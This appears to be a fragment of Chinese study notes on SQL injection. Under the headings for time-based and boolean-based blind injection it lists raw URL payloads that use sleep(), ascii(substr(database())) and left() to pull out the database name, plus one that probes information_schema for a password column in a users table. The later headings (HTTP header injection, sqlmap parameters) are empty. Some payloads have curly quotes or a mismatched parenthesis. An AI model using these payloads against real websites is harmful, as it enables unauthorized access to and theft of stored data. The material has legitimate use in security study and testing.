基于时间的盲注
表名的字典
1%27%20and%20if(ascii(substr(database(),1,1))>0,sleep(2),1)%20–+
?id=1’ and if(ascii(substr(database(),1,1))=0,sleep(2),1) --+
?id=1’ and if(left(database(),1)=‘s’,sleep(2),1) --+
基于布尔的盲注
?id=-1%27%20or%20left(database(),1)=%27u%27%20–+
?id=-1 or left(select column_name from information_schema.columns where table_name=‘users’ limit 5,1),8)=‘password’ --+
基于位置注入
http头注入
sqlmap参数
实操